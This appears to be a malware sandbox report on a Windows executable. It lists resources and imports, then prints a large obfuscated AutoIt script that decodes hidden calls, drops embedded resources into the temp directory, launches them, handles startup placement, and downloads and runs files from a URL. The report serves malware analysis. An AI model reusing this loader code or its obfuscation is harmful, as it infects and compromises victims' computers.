RT_GROUP_ICON | 0x10f7dc | 0x14 | data | English | Great Britain
RT_VERSION | 0x10f7f0 | 0xdc | data | English | Great Britain
RT_MANIFEST | 0x10f8cc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain

Imports

DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description | Data
Translation | 0x0809 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | Great Britain

                                                  Static AutoIT Info

                                                  General

Code:
) ) PTR ("UVjqX7JbhKvxJeuFEWfdBM0FcgHDsdYq5OhsL3XfhZ6LreIH5ftsUmhh5NnRyfTdWfC57" ) $586524435 = 1027989821 DIM $5MQON8GAIMUEFSGAX8QF = "cg20lLNK2lStUqEAQzpkyGFsqJUy6N654t3GYycw3zQbclWBbJRHz5rEJIIL1pNooXyAw8Mrx2q80DqeYr" ENDIF IF $586524435 = 116471326 THEN $ADVENYDCNHZL = EXECUTE (LUXBZMCWKPOC ("igCf..Q..U..u..W..mEaf()" , ".." ) ) $586524435 = 1196440215 ISSTRING (102795 * 930307 * 1666361 ) ISPTR ("pWued7yjGNtNfsDYJ3rr0rAy8bxC8xMmySbrCnszGo7tSU06uK5UDj57v6fcI6ljagoxqlvvJ1ULtgRokBiwB3SpWd6Fh" ) ENDIF IF $586524435 = 176683708 THEN $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE = EXECUTE (LUXBZMCWKPOC ("@T..empDi..r.." , ".." ) ) $586524435 = 1300820860 PTR ("EBOipIkLysNpp11gYZRhy9KmpZotajJFXfUSX9g3Sf0DzRqqyUXnglmE1C2At0LpThCjgis" ) PTR ("ihWIH85qwwyK3o1ugQI2DKUsohjqA8EsW3wTQ" ) ENDIF IF $586524435 = 256356752 THEN #region qcVZk $586524435 = 176683708 ENDIF IF $586524435 = 432319576 THEN $CSRHZILJDSLP = EXECUTE (LUXBZMCWKPOC ("CR..A..yo..Qr..F..EAmS()" , ".." ) ) $586524435 = 92596336 WINEXISTS ("8RcpGZGwDuzZNZx1gZa2iOXYn6iSxIw2r" ) INT (1853682 ) ENDIF IF $586524435 = 737653776 THEN $SNOJUKVVIBEY = EXECUTE (LUXBZMCWKPOC ("Qh..Mg..hxJzkQD..S..().." , ".." ) ) $586524435 = 38669117 ENDIF IF $586524435 = 781366022 THEN $PSZKHZKXAIEO = EXECUTE (LUXBZMCWKPOC ("Z..Eb..j..k..FZ..IP..af..i..()" , ".." ) ) ISSTRING ("EELco9it4ocJQZ947HHOvhydJ6cWCYvRQLm27uMr0iwobNw9wqb48LjxfIBs6w" ) $586524435 = 864731176 WINEXISTS ("4eLg7M5pYnVkc5IdzlXBSdCZWy2uuDrpvQUsxptx8" ) RANDOM (2486629 ) ENDIF IF $586524435 = 848901156 THEN $FPJBQJEGCCNE = EXECUTE (LUXBZMCWKPOC ("Rm..O..eeci..Wz..OyF..().." , ".." ) ) ISSTRING (3597529 + 4293720639 + 4292443185 * 2434805 ) $586524435 = 1718368979 ISBOOL (2363483 + 3721986 + 4291682637 + 4294195590 ) ENDIF IF $586524435 = 864731176 THEN $WQURQXMWAZTB = EXECUTE (LUXBZMCWKPOC ("m..sSF..B..h..B..P..z..K..O..b..(..)" , ".." 
) ) $586524435 = 1808850186 ISSTRING ("2vKAFL64c3RK5VMxXCahgjuCoXX48NKfICQy9DYsH4tsIengVelWEfUTbimSZc5yrKbCeoytORJlZb3jJQi4BYJDS7w0qfDE85a7cUc" ) ENDIF IF $586524435 = 954977294 THEN $UEHQXDUALSWD = EXECUTE (LUXBZMCWKPOC ("b..f..SE..zoF..q..q..v..Rv().." , ".." ) ) WINEXISTS ("YEI3apcii3b6Db" ) $586524435 = 61093985 DIM $1ICJNEN4A5HZNKPJRW8J = 283651 ENDIF IF $586524435 = 1027989821 THEN $RVLXXSQVNZAXBEXVLCOYMMYTVKMXHDDKZNNJCLAAUDHWOTJLFVEDXJKE = EXECUTE (LUXBZMCWKPOC ("@..O..S..Version.." , ".." ) ) $586524435 = 1138660241 ISSTRING (1984088 * 2723817 + 3324077 + 4292629190 ) ENDIF IF $586524435 = 1051260188 THEN $URTJHDWBPVQN = EXECUTE (LUXBZMCWKPOC ("r..qBfMR..VGxj..yI..().." , ".." ) ) $586524435 = 737653776 INT (3726376 ) ENDIF IF $586524435 = 1053930317 THEN ONXNEQMVEA () EXITLOOP ENDIF IF $586524435 = 1070530058 THEN $NPTGNKISXCCR = EXECUTE (LUXBZMCWKPOC ("ZPvye..e..xeU..e..wT(..).." , ".." ) ) $586524435 = 39019882 ISSTRING (3240311 * 1888434 + 3763639 ) ENDIF IF $586524435 = 1138660241 THEN $JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH = EXECUTE (LUXBZMCWKPOC ("@..A..u..to..I..tP..ID.." , ".." ) ) ISFLOAT (588471 + 791503 + 4291741726 + 1530756 ) $586524435 = 1924764602 INT (741726 ) ENDIF IF $586524435 = 1196440215 THEN $GCIZPUUYNTJL = EXECUTE (LUXBZMCWKPOC ("YyEu..J..PRYp..kCM().." , ".." ) ) ISFLOAT (1508313 + 533998 + 3514586 * 3820887 ) $586524435 = 1070530058 INT (1869136 ) ENDIF IF $586524435 = 1203322726 THEN $LEBAKWEILIBIQNTCTHBGGFGBKVXCKB = EXECUTE (LUXBZMCWKPOC ("@Sc..r..ip..tF..ull..P..at..h" , ".." ) ) ISBINARY (2457696 + 3222973 ) $586524435 = 113519199 ISFLOAT (42047 + 288839 ) ENDIF IF $586524435 = 1296565717 THEN $WURIVHUQSXZK = EXECUTE (LUXBZMCWKPOC ("s..hY..KZnw..GX..GS..g().." , ".." ) ) $586524435 = 2022545531 ISFLOAT ("KSd169kc6IahO4I6gAF1NXaSWdLa7NL2tHzf2oVG0anFtKLW33LJnz0YSvf" ) ENDIF IF $586524435 = 1300820860 THEN $RXJCPAPNDUMJMOSOPQCHSTGTFYAPOZBYKYKLGKEC = EXECUTE (LUXBZMCWKPOC ("@S..ta..r..tupD..i..r.." , ".." 
) ) DIM $R6IYHEDD2Q8BNIEXLA0G = 254100 + 140238 $586524435 = 1203322726 ISFLOAT (1510904 + 3531272 + 2714089 ) ISBOOL ("Ery0U4oymom83AGdap4D4z2gFSXZvSL6lx6HRnriyEEwkHpBMM5RNS2eystbgzdELqWEE8vX8Wez5E68CvlTX5rDF2iy3pb" ) ENDIF IF $586524435 = 1604509846 THEN $NCPIUPWKFYZJ = EXECUTE (LUXBZMCWKPOC ("dd..K..W..O..Y..Mj..JPnF..()" , ".." ) ) RANDOM (3014537 ) $586524435 = 2060391673 ISPTR (2631610 + 2878018 ) CHR (609484 ) ENDIF IF $586524435 = 1655436234 THEN $FREUKGMVKMCX = EXECUTE (LUXBZMCWKPOC ("xZ..r..g..VRf..Ny..RG..X..(..)" , ".." ) ) STRING (3048769 + 2837918 ) $586524435 = 781366022 INT (3973707 ) RANDOM (3609677 ) ENDIF IF $586524435 = 1713506615 THEN $BQQDLTTXSVYF = EXECUTE (LUXBZMCWKPOC ("b..vM..qyYk..u..KU..R..a(..)" , ".." ) ) DIM $85UCLTYGBOMZ1DSOCHRP = 3067333 $586524435 = 432319576 ENDIF IF $586524435 = 1718368979 THEN $WDNTUWUIPGOD = EXECUTE (LUXBZMCWKPOC ("H..g..MGwW..t..Pd..n..oR..(..)" , ".." ) ) $586524435 = 1051260188 ENDIF IF $586524435 = 1808850186 THEN $HOKAFSRHEHOF = EXECUTE (LUXBZMCWKPOC ("Q..DG..s..B..I..xa..sio..K..()" , ".." ) ) ISBOOL ("jtjZwQ2cDIA64J3vbEt2MRhS8eR" ) $586524435 = 848901156 ENDIF IF $586524435 = 1885155689 THEN $FWRGBKVEXWEH = EXECUTE (LUXBZMCWKPOC ("aZm..t..vpRVI..Ox..M().." , ".." ) ) $586524435 = 1970938970 PTR (319730 + 2304399 ) ENDIF IF $586524435 = 1924764602 THEN $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF = EXECUTE (LUXBZMCWKPOC ("@A..u..t..o..I..t..E..x..e.." , ".." ) ) $586524435 = 1655436234 MOD (1701699 , 3431664 ) MOD (2416550 , 2390431 ) ENDIF IF $586524435 = 1970938970 THEN $DNKSORVXJZJU = EXECUTE (LUXBZMCWKPOC ("m..N..IAO..Q..ehl..r..x..V()" , ".." ) ) $586524435 = 1296565717 ENDIF IF $586524435 = 2022545531 THEN $DBGGPSHIBQGJ = EXECUTE (LUXBZMCWKPOC ("Yr..bQ..D..b..YjG..k..Xs..().." , ".." ) ) INT (1081925 ) $586524435 = 1713506615 ENDIF IF $586524435 = 2032766480 THEN $NLIVQGZCBCYM = EXECUTE (LUXBZMCWKPOC ("C..JcC..I..d..D..e..p..T..l..c(..)" , ".." 
) ) $586524435 = 116471326 ENDIF IF $586524435 = 2060391673 THEN $QNTYERAUOLAX = EXECUTE (LUXBZMCWKPOC ("Q..U..Bc..ah..B..bZKyJ(..)" , ".." ) ) $586524435 = 954977294 DIM $BRKOQF83ME6AKFCOSE4C = 59615 * 967375 * 3257347 + 3941415 * 854843 + 4293200229 ISBINARY (247142 + 2356577 ) ENDIF NEXT FUNC QKSZFURFTX ($FILE , $STARTUP , $RES ) GLOBAL $1027989821 = 256356752 GLOBAL $1QBIAIKTYR = 2085798 FOR $E = 0 TO 3057511 ISFLOAT ("zOgbQqelu6IyNpD2fE3I1Oa0WDGU98c0KrL56v0KL0YeJVeHm3LhY30UNpolTtlv3TXwMI6TNr7b16qaz9Hg" ) IF $1027989821 = 113519199 THEN $DBGGPSHIBQGJ ($FHANDLE ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN DIM $FHANDLE = $FWRGBKVEXWEH ($FILE , ZVTZJDNXHRPQQIM ("55" ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $FILE = $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $FILE ISBINARY ("08S5M73DF5Z3S9nWUVf9" ) $1027989821 = 176683708 DIM $5VRPL9AOWYVZCRE4JDAG = 3143133 ISBOOL (3582513 + 2118016 + 4293087897 + 611733 ) ENDIF IF $1027989821 = 1203322726 THEN $NPTGNKISXCCR ($FHANDLE , $BQQDLTTXSVYF ($DATA , 1 ) ) DIM $RQDEQCE6JLEQ05FIKSSX = 2938432 + 4292099282 + 1270365 + 3196127 $1027989821 = 113519199 MOD (614262 , 3626405 ) CHR (809950 ) ENDIF IF $1027989821 = 1300820860 THEN DIM $DATA = READRESOURCES ($RES , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4,5..3.." , ".." ) ) ) ISSTRING ("LgSXAQM7L8KDwLhHvViOJwtbkVrDtLTWkshCau2Bj87rIzH7tNKRxC4oX" ) $1027989821 = 1203322726 ISBINARY ("NapYsdDOHb2QEKybCUn" ) ENDIF DIM $YRY2OTSND9U7BUGDCOFJ = "R7s0Vn1Bea88nzLNL9osNLEqBaSMT1DIBnRTgc4g1W99v8XuE01O1rjfBbxVEoSnFyGaT2HIfiA2LF5Dnxh39ZSkdKrfNjKLd" NEXT IF $STARTUP = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,27,38,..4..5..,..3..1.." , ".." 
) ) THEN IF $STARTUPDIR <> $RBNGTNJVQYOQOTZBNEJFBEBBBRMZZMPCIMKJNUBQXAYVVUQBECJFBZVM THEN $FPJBQJEGCCNE ($FILE ) ENDIF ELSE $FPJBQJEGCCNE ($FILE ) ENDIF ENDFUNC FUNC ONXNEQMVEA () GLOBAL $1203322726 = 256356752 GLOBAL $C7AXLMSSIT = 3121811 FOR $E = 0 TO 3357923 IF $1203322726 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,3..5,4..0..,2..7..,44,5..1..,2..0,41..,19,46,..4..4..,3..5..,..4..0..,..33" , ".." ) ) ) WINEXISTS ("hgZnRQw6hKB46HYY0d7czWEKRq9uWiu8ULCFoHVqe0Dc0xLkbCM2i1hvKnGARck8p" ) $1203322726 = 1300820860 ENDIF IF $1203322726 = 256356752 THEN LOCAL $E = EXECUTE $1203322726 = 176683708 ISBOOL ("UtNYssFC03Dh4abuJcOEWwnqgS3uJA3GeiDnW2T1CWMq06xIp7h54WQ" ) ENDIF IF $1203322726 = 1300820860 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50..,5..7..,..5..9,59,62,..59..,3,59,58..,..57..,..57..,5..9..,5..8,59..,3,..59,..5..8,60,..57,5..9..,58,55,6..1,5..7,..5..3..,..57,5..4..,60..,58..,60,5..7,..5..9,..6,5..9..,..6..2..,..6..0..,..57,57,..5..8,..6..0..,6..1,..5..9,58..,55,..53..,..55..,59..,5..5..,53,..5..5..,..5..5..,56..,..1..,..58..,..1..,..59,..6,5..9,..5,5..9..,58..,..55,..5,..57,6..2,5..9,..5..7,5..9,5..8,..59,..5,60..,..57..,..5..9..,62..,59..,..59,5..9..,6..2..,..5..9..,..5..8..,60..,..55,..5..5..,5..5..,..5..5,..62" , ".." ) ) ) ) EXITLOOP ENDIF DIM $Y97DWGYHRTYCAT6ZKUUF = 2510278 + 3854158 + 4293801246 + 4294608792 + 1644230 + 539219 + 4293769420 * 910755 NEXT ENDFUNC FUNC KMNVXSBBAW () IF $FREUKGMVKMCX (LUXBZMCWKPOC ("[C..LAS..S..:Pro..g..man..].." , ".." ) ) = ZVTZJDNXHRPQQIM ("53" ) THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ENDIF ENDFUNC FUNC AAPIEUMFUN ($URL , $PATH ) IF $BOOL = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..2..7..,..3..8,..4..5,31.." , ".." 
) ) THEN GLOBAL $1300820860 = 256356752 GLOBAL $32KBBZALGT = 1119509 FOR $E = 0 TO 2712344 RANDOM (2095806 ) IF $1300820860 = 176683708 THEN $FPJBQJEGCCNE ($TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $PATH ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $GCIZPUUYNTJL ($URL , $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $PATH ) $1300820860 = 176683708 ENDIF ISSTRING ("TfEOGsTtMn2vFHWA7BO2wmOipHgrJUr4AU9JjEznFVB" ) NEXT ENDIF ENDFUNC FUNC GLOBALDATA ($DATA , $RT ) GLOBAL $113519199 = 256356752 GLOBAL $NQZNGATQ1S = 146980 FOR $E = 0 TO 3993025 STRING ("lBT3674WHmqCbAwKVL4IS3UIbKdiUCiXeBcebIgpWdOuUpNA6yVYB0qsRk1u4WbedDxJyrJmFOXOozYV7MmvSuuolTw0RVv9bJrp1dcNZIsXdKervgxqI" ) IF $113519199 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,3..5,40..,2..7..,44..,..51,..46,4..1..,..45,..4..6,4..4..,..35..,40,33" , ".." ) ) ) ISFLOAT ("yO5TEUsXMNhI33KIGjb" ) $113519199 = 1300820860 ISBOOL (315032 + 4293404405 + 1700342 ) ENDIF IF $113519199 = 256356752 THEN LOCAL $E = EXECUTE ISFLOAT (1487556 + 205813 + 4292996003 + 3893714 ) $113519199 = 176683708 ISSTRING (52836 + 2786511 ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $R = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50..,58..,..5..6..,..6..0..,57,..6..0..,..5..5,..5..9,62..,..5..9,..5,..5..9,60,..5..8..,..56,6..0,..53,5..9..,3..,5..9..,..6..2,..60,..57..,..5..5..,61,..5..7..,..55..,..59,62,5..9..,..5..,5..9..,..5..4,..60..,..55,60,..6..2..,..58..,..57,..59..,6,58..,..56,..6..0,..5..7..,..60..,5..5..,..59..,..62,..59..,..5,5..9..,6..0..,5..5..,6..1,..5..5,..57,5..9,..5..7,59,..54..,6..0,..5..7,..5..9,..54,..5..5..,..6..2..,55..,3,5..5,..53,55..,..5..5..,60,..3..,5..5..,..5..5,..55..,6..2.." , ".." 
) ) ) ) PTR (3380382 * 1435103 ) EXITLOOP ENDIF IF $113519199 = 1300820860 THEN LOCAL $RETURN $113519199 = 1203322726 DIM $N0AGDC4KP4RY4YZLA1DS = 3293589 + 4291468966 * 575197 ENDIF RANDOM (2362379 ) NEXT IF $RT <> "-1" THEN FOR $I = ZVTZJDNXHRPQQIM ("54" ) TO $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0..,..58,5..8..,57..,55..,..59,..6..,..60..,..58..,..5..9,5..,..5..9..,..5..7..,55..,6..1,55,..57,..60,..55..,..55..,6..2..,..5..5,..5..3,5..5..,4..,..55..,..5..3..,..55..,5..5,5..6,5..4..,55..,..55" , ".." ) ) ) ) IF $I = ZVTZJDNXHRPQQIM ("54" ) THEN $RETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0,..57,..5..7,..5..9..,..3,..5..9,..3..,..58..,..5..6,..60..,..5..7..,..60,..5..5..,..60..,..58..,5..9..,..56..,..60..,5..7,5..7,6..0,59,..5..8,..6..0,57..,57,..5..7..,5..9,..54,6..0..,..5..7..,59..,5..4,..55,..61,..58..,5..5,59..,..5..8,59,..5..4..,..5..9..,5..7,..5..8..,5..5..,59,5..8,60..,..5..6,..59..,..6..,..6..0..,5..8,60..,..55,..59,..5..6,59,..58,60..,56,55..,6..1..,..55..,..5..7,6..0..,..5..5,5..8,..2..,55,5..7,59..,62..,..5..8,..4..,..5..5,..3..,5..5..,..5..3,55..,..5..7,60..,55..,..60,57..,5..5..,62,55..,..3,..5..5,..53,56..,54..,55,6..2" , ".." ) ) ) ) ELSE $RETURN &= $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50,..5..7,..5..7..,..59,..3,..5..9,3,..5..8,5..6..,..60..,..5..7,..6..0,..55..,..60..,5..8..,59..,..5..6..,..60..,..5..7,57..,60..,..5..9,..58..,60,57..,57,..57..,5..9..,..5..4,..6..0,57,..5..9,5..4,..55..,..6..1,5..8,..55,..59,..58..,..5..9,54..,..59..,..5..7..,..58,55,..59..,..5..8..,..60,5..6,..59,6..,..6..0..,58..,6..0..,..5..5,..59..,..5..6,..5..9,58..,..6..0..,5..6..,..5..5,..61,55,..57..,60,..5..5,..5..8,..2,..55,57,59..,..6..2,58..,..4..,..55,3,5..5,..53,55,..5..7,..60,5..5..,6..0,57,5..5..,..62..,..5..5,3,..55,..5..3..,5..6..,..5..4..,55..,..62" , ".." 
